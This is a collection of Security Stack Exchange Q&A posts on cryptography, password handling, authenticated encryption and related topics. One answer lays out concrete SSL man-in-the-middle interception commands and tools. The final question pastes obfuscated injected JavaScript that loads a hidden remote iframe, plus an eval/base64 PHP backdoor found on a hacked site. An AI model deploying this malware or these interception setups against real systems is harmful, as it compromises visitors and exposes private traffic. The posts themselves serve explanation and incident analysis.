You cannot have a secure signature scheme in less than 50 bits. Demonstration: the attacker can just enumerate all sequences of 50 bits until a match is found. Indeed, one point of digital signatures is that the verification algorithm can be computed by just everybody, since it uses only the public key (which, by definition, is public). Best you can hope, theoretically, is a signature of n bits for a security of 2 n . Traditional threshold of infeasibility was n = 80 bits, but the relentless advance of technology tends to raise that. Modern cryptographers tend to jump to 128 bits, because that's a power of two, hence beautiful (Kant notwithstanding, most aesthetic judgements are relative). 100 bits ought to be safe for quite some time, though. Among known signature algorithms which are believed to be secure, BLS is right now the best in class; it will produce signatures of size 2n bits for a security level of 2 n , so you are contemplating signatures of size 160 to 200 bits at least. There are algorithms which can go below (down to about 1.4*n ) but they have a rather long history of breakage and fixing and breakage again (I am talking about SFLASH and its ilk), so their use is not really recommended, and there's no directly usable standard. Another possibility is to use RSA with ISO/IEC 9796-2 padding . As the linked article shows, there are some subtleties with regards to its usage. This signature scheme is a scheme "with recovery" meaning that while the signature is rather bulky (1024 bits if you use a 1024-bit RSA key), it can also embed some of the data which is signed; so, if your problem is about appending a signature to a message, then this scheme will induce relatively low overhead. As the article explains, you get 2 61 protection for a signature overhead of 22 bytes, aka 176 bits; to get good security, you would have to use a hash function with an output size of, say, 224 bits, leading to a signature overhead of 240 bits -- not as good as the 200 bits of an equivalent-strength BLS, but better than the 400 bits of DSA or ECDSA (for still the same strength level).
{ "source": [ "https://security.stackexchange.com/questions/33044", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6439/" ] }
33,069
Forgive me if this should be in the crypto sub, but sometimes the answers there are very mathematical and I would rather have an answer which is a bit lighter on the math. I was watching the Cryptographer's panel from RSA 2013 and at about 33 minutes in they mentioned that ECC is more vulnerable than RSA in a post-quantum world. Can somebody explain why ECC is more vulnerable to RSA in a post-quantum world?
The current challenge in building a quantum computer is to aggregate enough "qubits", entangled together at a quantum level for long enough. To break a 1024-bit RSA modulus, you need a quantum computer with twice that (2048) qubits. To break a 160-bit elliptic curve, which has a "similar strength" (with regards to classical computers), you need six times that (or 960 qubits). It is not that elliptic curves are intrinsically weaker; on the contrary, they still seem somewhat stronger than RSA for the same "size". Rather, the strength ratio for a given size is not the same when considering classical computers versus quantum computers.
{ "source": [ "https://security.stackexchange.com/questions/33069", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16399/" ] }
33,095
I type my password to login to Win or Linux. Case 1: I get it right. Almost instant reaction. Case 2: I misspelled it. It takes a while, and then rebounds. Why does it takes longer to identify a wrong password vs a correct one? shouldn't the time to identify be the same?
It takes the same time to verify a wrong password and a correct one. But, when the password is wrong, the operating system makes you wait a bit. This is a security feature, to discourage people who try "potential passwords" (in particular people with some electronic skills, plugging in some circuitry which the computer will consider to be a keyboard, but which in reality tries a lot of passwords real fast). Such things don't work as well in a network context (if the attacker wants to try 100 passwords quickly, he can open 100 connections in parallel) but the password verification code is often shared between network and local logon.
{ "source": [ "https://security.stackexchange.com/questions/33095", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10413/" ] }
33,306
So, I was reading RFC 791, and got to the bit about options ( here ). Everything seemed to be decent and sensible, until I got to the 'levels of security' part. Now, I can understand how, internally, the DoD might want their packets to take special routes, but at the same time, wouldn't using an option like that simply alert people that, hey, this is the traffic most worth trying to decrypt/trace (assuming, of course, that someone sending something classified would also have the basic sense to encrypt the transmission)? Who would use that capability of IP? Why? When would it be helpful to anyone but an attacker sifting through a lot of information? ...Additionally... If I wrote a networked program which labeled all of its packets 'secret', for example, would they be treated any differently when routed through the internet than packets labeled simply 'unclassified' or 'confidential'?
The point of classification flags is that it tells routers what they are allowed to do with it. You wouldn't see classification flags on the open internet as they are handled by private government networks. What the flags do perform however is allow routers within the government network to determine if a packet should be allowed to bridge to a public or less secure network without having to understand what is within the packet. Be sure to check out Falcon Momot's answer as well. It has some excellent additional depth.
{ "source": [ "https://security.stackexchange.com/questions/33306", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20350/" ] }
33,323
This may seem like a rather nefarious question, however, my motivations are quite the opposite-- I want to know how at risk I might be! A while ago a very MASSIVE database was leaked that contained the personal information of millions of people. Unfortunately, I'd peg my chances of being in that database at about 80-90%. This means that floating around on the dark web, their could be enough information for a kid to open a credit card in my name and wreak havoc on my life. The institution that this information has leaked from had to give all possibly affected individuals free credit monitoring for 1 year. After that, the millions of us who were vulnerable are left to monitor ourselves and "hope" for the best. I don't trust blind hope. I imagine that when this data was leaked, it was seeded to all of the "typical" dark web sources. With that said, what is the best way for a non-hacker, developer or tech-savvy "power user" to search and discover leaked data so that they can verify whether they are vulnerable from a specific leak? Yes, I could be lying and looking for a quick way to find 100 SSNs. However, I don't think that's a good excuse to hide this information and not be given a straight answer. If the information is out there, it's out there and there's nothing we can do to stop the spread of the information. However, I can do my personal best to be informed as much as possible on the state of my credit risk and current vulnerability. That is all I am hoping to achieve.
Here is what I do... I assume my data is out there... I don't bother looking for it. Somebody will run across my SSN eventually and it will get scraped up into a database and sold around the world. As far as I'm concerned, searching for my data has little value and certainly won't put the horse back into the barn. In fact, even searching for my SSN or credit card numbers could expose them. I live in the US and have placed a credit freeze on our 6 credit reports (3 for me and 3 for my wife). This is done at the websites of the big 3 credit bureaus. When I need a new line of credit (loan, card, etc), I temporarily thaw the reports and they automatically re-freeze after a week or so (Just did this in order to refinance my home). This freezing and thawing process takes about 15 minutes online and has never cost me a cent. http://www.clarkhoward.com/news/clark-howard/personal-finance-credit/credit-freeze-and-thaw-guide/nFbL/
{ "source": [ "https://security.stackexchange.com/questions/33323", "https://security.stackexchange.com", "https://security.stackexchange.com/users/23721/" ] }
33,374
I'd like to perform a man-in-the-middle attack on SSL connections between clients and a server. Assuming the following: I've got a certificate that the client will accept, via poor cert validation or other means. I know the IP address of the server I'm trying to impersonate, and I'm in a position on the network to do things like ARP spoofing. The underlying protocol could be anything, from HTTP to custom / proprietary stuff. I could write some code to listen on a port, serve up the certificate and initiate SSL, then forward stuff on as a transparent proxy, then do some ARP spoofing to redirect traffic to me, but that's a lot of effort and becomes cumbersome when working on a test that has a tight time constraint. What's a quick / easy way to perform a man-in-the-middle attack? Are there any tools designed to facilitate this in a simple way, without lots of configuration? Something that's actively being maintained is a plus.
Updated: For HTTP you can use Burp Suite's proxy (Java), or mitmproxy . tcpcatcher is a more general Java-based GUI capture and modify proxy which might be closer to your requirements, it includes content decoding and modification (manual and programmatic). It's HTTP biased, but accepts any TCP. It has SSL support, though the only drawback seems to be there's no (documented) way to use your own specific certificate, only on-the-fly ones. You could easily use one of the options below to work around that. ettercap includes features for ARP, ICMP (redirect), DNS and DHCP "interventions", and supports direct SSL MITM (though not currently via GUI, you need to tinker with the conf and/or command line). This seems to be the best all-in-one for most purposes. sslsplit is another useful CLI tool, it's (mostly) for intercept and log, not modification. It's quicker to get started with than ettercap and has features like SNI inspection, dynamic certificate generation, support for *BSD and Linux FW/NAT, and OCSP / HPKP / SPDY countermeasures for HTTPS. You still have to get the traffic to it though. If you want quick, low tech and protocol agnostic, you can get most of the way there with just OpenSSL on a unix box: mkfifo request response openssl s_server -quiet -no_ssl2 -cipher AES128-SHA \ -accept 443 -cert fake.crt -key fake.key < response | tee -a request openssl s_client -quiet -connect www.server.com:443 < request | tee -a response -quiet also enables -ign_eof which suppresses special handling of characters at the start of the line (for line-buffered input), like "Q" for quit. s_client also supports basic STARTTLS capabilities: SMTP, POP3, IMAP, FTP (auth), XMPP and TELNET (from OpenSSL-1.1). Start each openssl in a different terminal. Replace the tee 's with something scripted to modify requests and replies if needed. It's not the most robust, but it might be useful. It supports DTLS, should you require that, IPv6 support requires OpenSSL-1.1. ( GnuTLS supports IPv6, and since v3.0 has DTLS support too, you can almost certainly do something similar with gnutls-serv and gnutls-cli , I haven't yet tried this though.) ncat with its -exec option should work too: ncat --ssl --ssl-cert fake.crt --ssl-key fake.key \ --sh-exec "openssl s_client -quiet -connect www.server.com:443" \ -kl 127.0.0.1 4443 You can just use " --exec " and wrap up your own client in a script instead. With s_client it helps performance a lot to pre-create a session file, then add -sess_in ssl.sess -sess_out ssl.sess to your invocations. Again, if you need to script/code the MITM yourself socat is another good (and probably the most robust) option: CERT="cert=test.crt,key=test.key,verify=0" SSL="cipher=AES128-SHA,method=TLSv1" socat \ OPENSSL-LISTEN:4443,bind=127.0.0.1,reuseaddr,$CERT,$SSL,fork \ EXEC:mitm.sh With a one-liner like openssl s_client -quiet -connect www.server.com:443 in mitm.sh to start with, works just like an inetd client. stunnel is more proxy-like than socat, it has one big advantage that I don't see anywhere else: it supports in-protocol TLS upgrades/ STARTTLS , for POP3, IMAP, SMTP and a few others in client and server modes; though LDAP and FTP are notable omissions (the latter understandably). Its inetd mode can be (ab)used just as with the "exec" options above. For modifying generic text-based common internet protocols using these methods you might be able to get away with some sed (like a more connection friendly netsed ) or light expect scripting. The multi-protocol proxy Delegate also supports external (inetd-like) handling, and integrated scripting support for matching, filtering and rewriting for a subset of the supported protocols. The only other things I can think of close to generic protocol agnostic MITM proxies are fuzzing tools, like proxyfuzz , or multi-protocol modular ones like backfuzz (be careful searching for that last one ;-). Other possibly useful tools (for misdirecting traffic) include: dsniff , including arpspoof another arpspoof this version with IPv6 support arpsend from vzctl dnschef DNS proxy/server (Python) I also came across references to Zorp several times while rummaging through my notes, non-free available in both a commercial (I have no affiliation) and a GPL version . Worth a mention, due to its claims of being a modular, extensible (by way of Python) multi-protocol firewall/gateway. TLS inspection is supported in the GPL version (SSH and others seem limited to the non-GPL version).
{ "source": [ "https://security.stackexchange.com/questions/33374", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5400/" ] }
33,410
You have a zip file that you created with 7z to password-protect it with AES 128. Can a smart adversary extract the data only through brute force, or is the file vulnerable to other attacks - such as, I don't know, being able to bypass the password and extract the data?
ZIP files are encrypted with AES-256, and the key is derived using a slow key-derivation function (KDF), which makes bruteforce and dictionary attacks generally infeasible. There are no currently known ways to bypass the encryption.
{ "source": [ "https://security.stackexchange.com/questions/33410", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4980/" ] }
33,428
I see situations where you may have to input the same password more than once. You may type it in a text editor and copy it to clipboard, to paste it two or more times. In what scenarios this could be a bad idea?
The Windows clipboard is not secure. This is a quote from a MSDN article . The Clipboard can be used to store data, such as text and images. Because the Clipboard is shared by all active processes, it can be used to transfer data between them. This should probably apply to Linux machines as well. Is this a concern? No. For someone to exploit this, he would have to have malware on your machine capable of reading data from the clipboard. If he has the capability of getting malware on your machine, you have much bigger things to worry about as there are plenty of other stuff he can do, including keyloggers and the like.
{ "source": [ "https://security.stackexchange.com/questions/33428", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4980/" ] }
33,434
What is the maximum number of bytes for encrypting a plaintext message using RSA that is reasonably secure and also efficient and would AES be better for the same size in bytes? The encryption doesn't have to be public by the way, I'm just wondering if AES is just as good on a short message as it is on a large document. Basically the message or document would be sent encrypted but the key would never be made public. I guess that would also defeat the purpose of RSA but I've read a few times online that RSA is good for short messages and AES is good for long ones.
RSA, as defined by PKCS#1 , encrypts "messages" of limited size. With the commonly used "v1.5 padding" and a 2048-bit RSA key, the maximum size of data which can be encrypted with RSA is 245 bytes. No more. When you "encrypt data with RSA", in practice, you are actually encrypting a random symmetric key with RSA, and then encrypt the data with a symmetric encryption algorithm, which is not limited in size. This is how it works in SSL , S/MIME , OpenPGP ... Regularly, some people suggest doing "RSA only" by splitting the input message into 245-byte chunks and encrypting each of them more or less separately. This is a bad idea because: There can be substantial weaknesses in how the data is split and then rebuilt. There is no well-studied standard for that. Each chunk, when encrypted, grows a bit (with a 2048-bit key, the 245 bytes of data become 256 bytes); when processing large amounts of data, the size overhead becomes significant. Decryption of a large message may become intolerably expensive. When encrypting data with a symmetric block cipher, which uses blocks of n bits, some security concerns begin to appear when the amount of data encrypted with a single key comes close to 2 n/2 blocks, i.e. n*2 n/2 bits. With AES, n = 128 (AES-128, AES-192 and AES-256 all use 128-bit blocks). This means a limit of more than 250 millions of terabytes, which is sufficiently large not to be a problem. That's precisely why AES was defined with 128-bit blocks, instead of the more common (at that time) 64-bit blocks: so that data size is practically unlimited.
{ "source": [ "https://security.stackexchange.com/questions/33434", "https://security.stackexchange.com", "https://security.stackexchange.com/users/23786/" ] }
33,470
I have always wondered why so many websites have very firm restrictions on password length (exactly 8 characters, up to 8 characters, etc). These tend to be banks or other sites where I actually care about their security. I understand most people will pick short passwords like "password" and "123456" but are there technical reasons to force this? Using an application like 1Password, almost all my passwords are something like fx9@#^L;UyC4@mE3<P]uzt or other randomly generated long strings of unlikely to guess things. Are there specific reasons why websites enforce strict bounds on password lengths (more like 8 or 10, I understand why 100000000 might be a problem...)?
Take five chimpanzees. Put them in a big cage. Suspend some bananas from the roof of the cage. Provide the chimpanzees with a stepladder. BUT also add a proximity detector to the bananas, so that when a chimp goes near the banana, water hoses are triggered and the whole cage is thoroughly soaked. Soon, the chimps learn that the bananas and the stepladder are best ignored. Now, remove one chimp, and replace it with a fresh one. That chimp knows nothing of the hoses. He sees the banana, notices the stepladder, and because he is a smart primate, he envisions himself stepping on the stepladder to reach the bananas. He then deftly grabs the stepladder... and the four other chimps spring on him and beat him squarely. He soon learns to ignore the stepladder. Then, remove another chimp and replace it with a fresh one. The scenario occurs again; when he grabs the stepladder, he gets mauled by the four other chimps -- yes, including the previous "fresh" chimp. He has integrated the notion of "thou shallt not touch the stepladder". Iterate. After some operations, you have five chimps who are ready to punch any chimp who would dare touch the stepladder -- and none of them knows why. Originally, some developer, somewhere, was working on an old Unix system from the previous century, which used the old DES-based "crypt" , actually a password hashing function derived from the DES block cipher. In that hashing function, only the first eight characters of the password are used (and only the low 7 bits of each character, as well). Subsequent characters are ignored. That's the banana. The Internet is full of chimpanzees.
{ "source": [ "https://security.stackexchange.com/questions/33470", "https://security.stackexchange.com", "https://security.stackexchange.com/users/19657/" ] }
33,531
I'm afraid I'll have tomatoes thrown at me for asking this old question, but here goes. After reading that cooking up your own password hash out of existing hashing functions is dangerous over and over again I still don't understand the logic. Here are some examples: md5(md5(salt) + bcrypt(password)) scrypt(bcrypt(password + salt)) sha1(md5(scrypt(password + md5(salt)))) The typical arguments against these go as follows: You're not a cryptographer! You've got no idea if these hashes are more secure. Leave it to the experts who know what they're doing. These add no extra security. Granted they don't improve the function as a hash (i.e. make it harder to reverse or find collisions etc.), but surely surely they don't make it worse as a hash? If they did then hackers would be able to re-hash standardly hashed passwords into these wacky hashes as they see fit and weaken the hash? I don't buy it. Second argument: Kerckoffs's principle : A cryptosystem should be secure even if everything about the system is known. Agreed. This is basically the motivation for not storing your passwords as plaintext in the first place. But if my response to the first criticism stands then these wacky hashes still function as secure hashes, and our system doesn't break Kerckoffs's principle anymore than it would with a standard hash. Here are two possible (and worthwhile, as far as I can see) advantages to using a "wacky" hash over a normal hash: Sure, your system should be secure if the attacker has the source code, but it's a very likely possibility that your attacker wont have access to your source code and probably won't be able to guess your wacky hash, making any attempt at a brute force impossible. (This one is the real motivation behind me asking this question) BCrypt is thought to be secure, hard for the CPU and GPU (great) but can be very fast with specialized hardware . SCrypt is said to be hard to bruteforce on CPUs, GPUs and currently available specialized hardward but is more recent and not trusted by the cryptographic community as much as BCrypt due to the lack of exposure it's had. But doesn't the hash BCrypt(SCrypt(password + salt)) get the best of both worlds? I appreciate that the passion/anger behind most rants against these home-brewed hashes comes from the average programmer's lack of knowledge of what makes a good hash, and a worry that encouraging this sort of wacky-hashing will inevitably end up with weak and useless hashes getting into production code. But If the wacky hash is carefully constructed out of solid and trusted hashes, are the gains in security not very valuable and real? Update I got a bunch of good answers on this, thanks. What I seemed to be overlooking in my assumptions was that, although combining hashes can't make it easier to crack the original password and therefore crack the constituent hashes, the combination of two or more secure hashes can - at least in principle - be weaker than any one of its inner hashes due to the unstudied and complex interactions between them. Meaning it could be possible to find some string that got past the wacky hash without necessarily breaking the hashes that made it up.
The fact that you need to ask this question is the answer itself - you do not know what is wrong with stacking these primitives, and therefore cannot possibly know what benefits or weaknesses there are. Let's do some analysis on each of the examples you gave: md5(md5(salt) + bcrypt(password)) I can see a few issues here. The first is that you're MD5'ing the salt. What benefit does this give? None. It adds complexity, and the salt is simply meant to be unique to prevent password collisions and pre-computation (e.g. rainbow table) attacks. Using MD5 here doesn't make any sense, and might actually weaken the scheme since MD5 has known trivial collisions. As such, there is a small possibility that introducing MD5 here might mean that two unique salts produce the same MD5 hash, resulting in an effectively duplicated salt. That's bad. Next, you use bcrypt on the password. Ok. Well, most bcrypt implementations require a salt internally, so this is already technically invalid. Let's say you know that, and you meant to say bcrypt(md5(salt), password) . This part is still falling to the weakness I described above, but it's not too shabby - remove the MD5 and it's a standard use of bcrypt. Finally, you MD5 the whole thing. Why are you doing this? What is the purpose? What benefit does it bring? As far as I can see, there is no benefit at all. On the detriment side, it adds more complexity. Since most bcrypt implementations use the $2a$rounds$salt$hash notation, you're going to have to write code to parse that so that you can extract the hash part and store the rest separately. You're also going to need an MD5 implementation, which was unnecessary. So, in terms of code footprint for potential attack vectors, you've gone from a simple bcrypt implementation, to a bcrypt implementation with custom parsing code, and MD5 implementation, and some glue code to stick it all together. For zero benefit, and a potential vulnerability in salt handling. Next one: scrypt(bcrypt(password + salt)) This one isn't too bad, but again you need some code to parse out the results of bcrypt into hash and salt / round count separately. In this case I'd guess that there is a slight benefit, because bcrypt and scrypt work in different ways for roughly the same goal, which would make it a little more difficult for an extremely well-funded attacker to build custom ASICs to break your scheme. But is that really necessary? Are you really going to hit a situation where a nation state will devote a few million dollars to just to break your hash? And, if that case ever arises, will it really bother the attacker to have to spend a few extra million to double their chip count? Another potential issue with combining bcrypt and scrypt like this is that there has been very little study into how the two interact. As such, we don't know if there are any weird cases that can cause problems. As a more obvious example, take the one time pad. We compute c=m^k for some message m and some equally long perfectly random key k , and we get perfect security. So let's do it twice , for even more security! That gives us c=m^k^k ... oh, wait, that just gives us m . So because we didn't take the time to properly understand how the internals of the system worked, we ended up with a real security vulnerability. Obviously it's more complicated in the case of KDFs, but the same principle applies. And finally: sha1(md5(scrypt(password + md5(salt)))) Again we're running into the MD5'ed salt issue. I'm also intrigued by MD5'ing the SHA1 hash. What possible benefit could that have, if you're already using a slow KDF like scrypt? The few nanoseconds it would take to compute those hashes pales in comparison to the hundreds of milliseconds it would take to compute the scrypt digest of the password. You're adding complexity for an absolutely irrelevant layer of "security", which is always a bad thing. Every line of code that you write is a potential vulnerability. Now remember that point I made at the start of my answer. If, at any point in this answer, you thought "oh yeah, I didn't think about that", then my point is proven. You're running into what I would describe as Dave 's false maxim: If I add more crypto things, it will be more secure. This is a common trait among developers, and I once believed it too. It goes hand-in-hand with denial of other principles, such as Kerckhoff's Principle . Ultimately, you have to realise and accept that obscurity isn't a safety rail; it's a crutch for weak crypto. If your crypto is strong, it needs no crutch.
{ "source": [ "https://security.stackexchange.com/questions/33531", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24011/" ] }
33,569
I've been reading up on Authenticated Encryption with Associated Data . The linked RFC states: Authenticated encryption is a form of encryption that, in addition to providing confidentiality for the plaintext that is encrypted, provides a way to check its integrity and authenticity. My understanding is that simply encrypting the data, even using a symmetric shared key, with something like AES or 3DES should be sufficient to verify the data has not been tampered with in transit. If it had been, the message simply would not decrypt. So, why is a separate authentication necessary? In what situation would you need to have a separate authentication (even using plain HMAC with encryption)?
Encryption DOES NOT automatically protect the data against modification. For example, let's say we have a stream cipher that is simply a PRNG (random number generator), where the key is the seed. Encryption works by generating random numbers in sequence (the keystream) and exclusing-or'ing them with the plaintext. If an attacker knows some plaintext and ciphertext bytes at a particular point, he can xor them together to recover the keystream for those bytes. From there, he can simply pick some new plaintext bytes and xor them with the keystream. Often the attacker need not know the plaintext to achieve something. Let's take an example where an attacker simply needs to corrupt one particular field in a packet's internal data. He does not know what its value is, but he doesn't need to. Simply by replacing those bytes of ciphertext with random numbers, he has changed the plaintext. This is particularly interesting in block ciphers where padding is used, as it opens us up to padding oracle attacks . These attacks involve tweaking ciphertext in a way that alters the padding string, and observing the result. Other attacks such as BEAST and the Lucky Thirteen Attack involve modification of ciphertext in a similar way. These tend to rely on the fact that some implementations blindly decrypt data before performing any kind of integrity checks. Additionally, it may be possible to re-send an encrypted packet, which might cause some behaviour on the client or server. An example of this might be a command to toggle the enabled state of the firewall. This is called a replay attack, and encryption on its own will not protect against it. In fact, integrity checks often don't fix this problem either. There are, in fact, three primary properties that are desirable in a secure communications scheme: Confidentiality - The ability to prevent eavesdroppers from discovering the plaintext message, or information about the plaintext message (e.g. hamming weight). Integrity - The ability to prevent an active attacker from modifying the message without the legitimate users noticing. This is usually provided via a Message Integrity Code (MIC). Authenticity - The ability to prove that a message was generated by a particular party, and prevent forgery of new messages. This is usually provided via a Message Authentication Code (MAC). Note that authenticity automatically implies integrity. The fact that the MAC and MIC can be provided by a single appropriately chosen HMAC hash scheme (sometimes called a MAIC) in certain circumstances is completely incidental. The semantic difference between integrity and authenticity is a real one, in that you can have integrity without authenticity, and such a system may still present problems. The real distinction between integrity and authenticity is a tricky one to define, as Thomas Pornin pointed out to me in chat: There's a tricky definition point there. Integrity is that you get the "right data", but according to what notion of "right" ? How comes the data from the attacker is not "right" ? If you answer "because that's from the attacker, not from the right client" then you are doing authentication... It's a bit of a grey-area, but either way we can all agree that authentication is important. An alternative to using a separate MAC / MIC is to use an authenticated block cipher mode, such as Gallois/Counter Mode (GCM) or EAX mode .
{ "source": [ "https://security.stackexchange.com/questions/33569", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24133/" ] }
33,604
If an application crashes, the program stops and there is nothing anyone can do about it, other than starting the program again. Crash is a bad behaviour in general and should be avoided, but why are they seen as security vulnerability?
It crashed because some input was not processed correctly. An attacker may try to find the code path that leads to the faulty procedure and attempt to execute arbitrary code through potential vulnerabilities. Crashes may give an attacker valuable information about the system and its internal details. Crashes may create temporary vulnerabilities or leave unprotected files (e.g. memory dumps) that may be exploited. (Thanks and a hat tip go to Ladadadada ) The application that crashes needs to be restarted, which obviously takes time (even with watchdogs and symmetric failover schemes). If an attacker replicates the conditions leading to the crash your service will suffer from prolonged outage ( Denial-of-service ) which means financial, reputation, and other losses.
{ "source": [ "https://security.stackexchange.com/questions/33604", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24121/" ] }
33,618
In my company, they don't allow accessing the company email or servers from outside the company network. To access the email from outside the network, you have to use: Username, password and a number generated from a small number generator. How does this verification method work?
There are several methods for such tokens. One of them is HOTP : the token and the server both share a common secret value, and a counter; from the secret and the current counter value, a one-time password can be generated (the token displays it, the server verifies that the entered password matches that which was expected). Some tokens also include the current date and time in the process, so that the one-time password is also limited in time: this supposes that the user pushes the button on the token and immediately enters the displayed password (the use of time prevents the user from generating some OTP in advance and writing them down on a piece of paper). The usual standard for that is TOTP .
{ "source": [ "https://security.stackexchange.com/questions/33618", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20337/" ] }
33,664
One of my sites has just been hacked as this code has been inserted into random(?) files and places within the files. Does anyone understand what it is trying to do? I would welcome anything that may assist me with finding out how it got on. Also, any suggestions on how to stop it re-appearing? Every time I delete it, it just comes back a short while later. <!--0242d5--><script type="text/javascript" language="javascript" > p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!7a!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!7a!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!70!7a!74!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!70!7a!74!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=62;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-485!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5--> ---- CODE in various places and end of files ---- <? #0242d5# eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw=="))); #/0242d5# ?> -- (within above tags [#0242d5# and #/0242d5#] is this code -that wont show properly with just pasting here) eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));
